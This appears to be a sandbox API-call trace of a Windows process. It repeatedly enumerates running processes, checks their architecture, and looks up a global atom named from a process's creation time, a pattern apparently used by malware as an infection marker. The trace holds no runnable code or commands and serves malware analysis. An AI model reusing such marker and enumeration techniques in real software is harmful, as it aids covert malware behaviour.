	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0085.852] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.852] CloseHandle (hObject=0x69c) returned 1
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0085.852] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.852] CloseHandle (hObject=0x69c) returned 1
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0085.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.853] CloseHandle (hObject=0x69c) returned 1
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0085.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.853] CloseHandle (hObject=0x69c) returned 1
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0085.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.853] CloseHandle (hObject=0x69c) returned 1
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0085.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.853] CloseHandle (hObject=0x69c) returned 1
	[0085.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0085.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.853] CloseHandle (hObject=0x69c) returned 1
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0085.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.854] CloseHandle (hObject=0x69c) returned 1
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0085.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.854] CloseHandle (hObject=0x69c) returned 1
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0085.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.854] CloseHandle (hObject=0x69c) returned 1
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0085.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.854] CloseHandle (hObject=0x69c) returned 1
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0085.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.855] CloseHandle (hObject=0x69c) returned 1
	[0085.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0085.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0085.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0085.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0085.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0085.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0085.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.856] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.857] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.857] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.857] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.857] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.857] CloseHandle (hObject=0x69c) returned 1
	[0085.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0085.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.858] CloseHandle (hObject=0x69c) returned 1
	[0085.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0085.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.858] CloseHandle (hObject=0x69c) returned 1
	[0085.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.858] CloseHandle (hObject=0x69c) returned 1
	[0085.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.858] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.858] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.858] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.859] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.859] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.859] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.859] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.859] CloseHandle (hObject=0x69c) returned 1
	[0085.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0085.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.860] CloseHandle (hObject=0x69c) returned 1
	[0085.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0085.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.860] CloseHandle (hObject=0x69c) returned 1
	[0085.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17258) returned 0xc0000004
	[0085.932] VirtualAlloc (lpAddress=0x0, dwSize=0x17358, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17358, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0085.937] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.937] CloseHandle (hObject=0x69c) returned 1
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0085.937] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.937] CloseHandle (hObject=0x69c) returned 1
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0085.937] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.937] CloseHandle (hObject=0x69c) returned 1
	[0085.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0085.937] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0085.938] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0085.938] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0085.938] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0085.938] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0085.938] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.938] CloseHandle (hObject=0x69c) returned 1
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0085.939] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.939] CloseHandle (hObject=0x69c) returned 1
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0085.939] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.939] CloseHandle (hObject=0x69c) returned 1
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0085.939] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.939] CloseHandle (hObject=0x69c) returned 1
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0085.939] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.939] CloseHandle (hObject=0x69c) returned 1
	[0085.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0085.939] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.939] CloseHandle (hObject=0x69c) returned 1
	[0085.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0085.940] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.940] CloseHandle (hObject=0x69c) returned 1
	[0085.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0085.940] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.940] CloseHandle (hObject=0x69c) returned 1
	[0085.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0085.940] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.940] CloseHandle (hObject=0x69c) returned 1
	[0085.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0085.940] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.940] CloseHandle (hObject=0x69c) returned 1
	[0085.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0085.940] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.940] CloseHandle (hObject=0x69c) returned 1
	[0085.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0085.941] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.941] CloseHandle (hObject=0x69c) returned 1
	[0085.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0085.941] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.941] CloseHandle (hObject=0x69c) returned 1
	[0085.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0085.941] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.941] CloseHandle (hObject=0x69c) returned 1
	[0085.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0085.941] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.941] CloseHandle (hObject=0x69c) returned 1
	[0085.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0085.941] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.941] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0085.942] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.942] CloseHandle (hObject=0x69c) returned 1
	[0085.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.943] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.943] CloseHandle (hObject=0x69c) returned 1
	[0085.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0085.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.943] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0085.943] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0085.943] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0085.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.944] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0085.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0085.944] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0085.944] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0085.944] CloseHandle (hObject=0x69c) returned 1
	[0085.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0085.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0085.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0085.945] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.945] CloseHandle (hObject=0x69c) returned 1
	[0085.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0085.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0085.945] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.945] CloseHandle (hObject=0x69c) returned 1
	[0086.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17258) returned 0xc0000004
	[0086.016] VirtualAlloc (lpAddress=0x0, dwSize=0x17358, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0086.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17358, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0086.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0086.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
